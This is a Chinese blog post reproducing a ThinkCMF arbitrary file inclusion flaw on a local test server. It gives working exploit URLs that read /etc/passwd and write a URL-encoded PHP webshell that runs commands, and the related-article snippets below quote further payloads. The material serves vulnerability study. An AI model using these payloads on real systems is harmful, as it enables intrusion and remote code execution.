ThinkCMF 任意文件包含漏洞复现

最新推荐文章于 2023-11-18 17:00:52 发布
最新推荐文章于 2023-11-18 17:00:52 发布
阅读量856 收藏
点赞数
分类专栏: 漏洞 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43740200/article/details/103089004
版权

这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。

搭建环境,放到服务器上。

先来试试读取README文件

http://127.0.0.1/?a=display&templateFile=REMADE.md

 

kn1fe

emmm,好使,再来读读系统文件

http://127.0.0.1/?a=display&templateFile=/etc/passwd
kn1fe

 

真香,尝试一下文件包含webshell

http://127.0.0.1/?a=fetch&tem ... %27%27&content=<php>file_put_contents('0a30e0d61182dbb7c1eed5135787fb84.php','%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e')</php>

 

kn1fe

完美,哈哈!

当然复现过程不会那么顺利,踩了好多坑,看了好多文档。

继续学习继续学习!!!

这么酷吗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkCMF上传漏洞
X__WY__X的博客
09-14 797
ThinkCMF上传漏洞 一.漏洞描述 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 二.漏洞原理 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 三.环境搭建 下载ThinkCMF X2.2.0 链接:https:
【组件攻击链】ThinkCMF 高危漏洞分析与利用
systemino的博客
11-27 967
一、组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 普通的CMS(内容管理系统)一般不能完成所有的需求,而因为CMS在ThinkCMF内部
ThinkPHP 系列漏洞
最新发布
SHELLCODE_8BIT的博客
11-18 2418
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
ThinkCMF X2.2.2 漏洞获取网站权限测试
xu_1234567的博客
09-15 331
1.测试环境 创建ThinkCMF X2.2.2框架,下载antsword,下面是AntSword官网 https://github.com/AntSwordProject/antSword/releases 下载完成后进行安装,安装教程可百度查询 2.漏洞利用 在ThinkCMF X2.2.2框架中通过构造a参数的fetch方法,创建文件在文件写入一句话木马代码 ?a=fetch&templateFile=public/index&prefix=''&content=<php
ThinkCMF+Dedecms+discuz漏洞复现
热门推荐
1ance's blog
11-13 1万+
写在前面:本文为网上下载的cms搭建的靶场环境,内含thinkCMF+dedecms+discuz!;通过对靶场的测试,对cms的漏洞进行复现。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录0x001 环境搭建0x002 漏洞复现0x01 弱口令0x02 任意文件上传0x03 头像上传处存在任意文件删除漏洞0x04 任意文件包含漏洞0x05 后台存在SQL注入0x06 URL重定向0x07 远程代码执行0x08 任意文件上传0x09 存储型XSS0x10 远程代码执行0x11 个人资料处存在存储型
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
thinkcmf 上传视图文件管理
12-07
thinkcmf框架的插件. 原框架上传文件需要多次上传同一文件,占用资源. 插件解决当前用户的资源重复利用
ThinkCMF-plugins:ThinkCMF插件
04-28
ThinkCMF插件以上插件均在ThinkCMF6.0.2 版测试通过插件市场地址插件拷贝值项目public\plugins\目录下即可。管理后台/插件列表 中启用你所需要的插件效果查看地址如果有使用问题欢迎提交 Issues 反馈。5.0版本用户可...
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1161
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
ThinkCMF框架任意文件包含 漏洞复现
偷一个月亮
03-16 1004
0x01 简介 ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。 0x02 漏洞版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkC...
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 820
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1602
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1512
【thinkcmf-文件包含】public函数
ThinkCMFX漏洞合集
https://www.cnblogs.com/zpchcbd/
08-13 5589
前台的SQL注入(需要前台会员权限) : POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1 Host: localhost Connection: close Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95 Content-Type: application/...
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2132
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2012
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
thinkcmf6 文件上传
11-18
以下是thinkcmf6文件上传的方法: 1.在前端页面中添加一个文件上传表单,例如: ```html ('user/asset/upload')}" method="post" enctype="multipart/form-data"> 上传 ``` 2.在后端控制器中编写上传文件的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值